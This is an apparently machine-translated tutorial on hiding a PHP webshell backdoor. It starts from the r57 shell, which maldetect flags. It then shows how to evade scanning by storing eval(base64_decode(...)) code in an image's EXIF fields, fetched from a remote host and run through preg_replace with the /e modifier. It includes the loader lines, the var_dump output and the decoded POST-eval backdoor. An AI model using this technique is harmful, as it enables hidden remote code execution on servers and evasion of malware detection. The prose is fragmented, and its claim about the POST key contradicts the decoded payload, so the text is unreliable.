Demonstration with foreign r57 Series
First look at the webshell source code
Pay attention to base64 encoding. After decoding, execute php to generate
Upload File page,
Secure software scanning tools typically Scan System Searches
Find webshell backdoor code to find the backdoor, such
We use maldetect to analyze the r57
Webshell:
$ sudo /usr/local/maldetect/maldet --config-option quar_hits=0,quar_clean=0,clamav_scan=1 -a "/tmp/lin.php"Linux Malware Detect v1.4.2(C) 2002-2013, R-fx Networks (C) 2013, Ryan MacDonald inotifywait (C) 2007, Rohan McGovern This program may be freely redistributed under the terms of the GNU GPL v2maldet(92294): {scan} signatures loaded: 9011 (7145 MD5 / 1866 HEX)maldet(92294): {scan} building file list for /tmp/lin.php, this might take awhile...maldet(92294): {scan} file list completed, found 1 files...maldet(92294): {scan} 1/1 files scanned: 0 hits 0 cleanedmaldet(92294): {scan} scan completed on /tmp/lin.php: files 1, malware hits 1, cleaned hits 0maldet(92294): {scan} scan report saved, to view run: maldet --report 101113-1250.92294maldet(92294): {scan} quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294$ sudo maldet --report 101113-1250.92294malware detect scan report for MacBook-Pro-2.local:SCAN ID: 101113-1250.92294TIME: Oct 11 12:50:48 -0400PATH: /tmp/lin.phpTOTAL FILES: 1TOTAL HITS: 1TOTAL CLEANED: 0NOTE: quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294FILE HIT LIST:{MD5}base64.inject.unclassed.1 : /tmp/lin.php===============================================Linux Malware Detect v1.4.2 < proj@rfxn.com >
Apparently, maldetect scanned and found
Base64 php backdoor.
To avoid scanning, use EXIF to transmit data.
If you use a browser to view the source code, you can find unix
Add the string to the top code.
Next, upload the file and view the EXIF data.
, Php code segment in EXIF Standard Format
Insertion does not affect rendering of the image file itself.
Php built-in function exif_read_data allows Image
File Header, for example, facebook:
Therefore, you can use exif_read_data to read
Map defined on local or remote host
The file header contains our php code.
The format is as follows:
$exif = exif_read_data('http://ruo.me/exif.jpg');preg_replace($exif['Make'],$exif['Model'],'');
Download the remote image and set the $ exif Array
Variable assignment, through Definition Simulation:
$exif = exif_read_data('http://ruo.me/exif.jpg');var_dump($exif);
After execution, you will get the following output: The last step is to execute the php preg_replace function.
$ php ./get.phparray(9) {["FileName"]=>string(8) "exif.jpg"["FileDateTime"]=>int(0)["FileSize"]=>int(6159)["FileType"]=>int(2)["MimeType"]=>string(10) "image/jpeg"["SectionsFound"]=>string(13) "ANY_TAG, IFD0"["COMPUTED"]=>array(5) {["html"]=>string(23) "width="155" height="77""["Height"]=>int(77)["Width"]=>int(155)["IsColor"]=>int(1)["ByteOrderMotorola"]=>int(0)}["Make"]=>string(5) "/.*/e"["Model"]=>string(108) "eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));"}
$exif = exif_read_data('ruo.me/exif.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
Note the regular expression used by the make variable.
Format/. */e, the code after base64 decryption will be executed:
if (isset($_POST["exif"])) {eval(stripslashes($_POST["exif"]));}
Check whether the post name is exif.
If yes, run eval.
Code of the exif_read_data and exif_replace Functions
Combined with the access backdoor.
This backdoor is widely used.
The encrypted base64 code, hundreds
Attacked instances: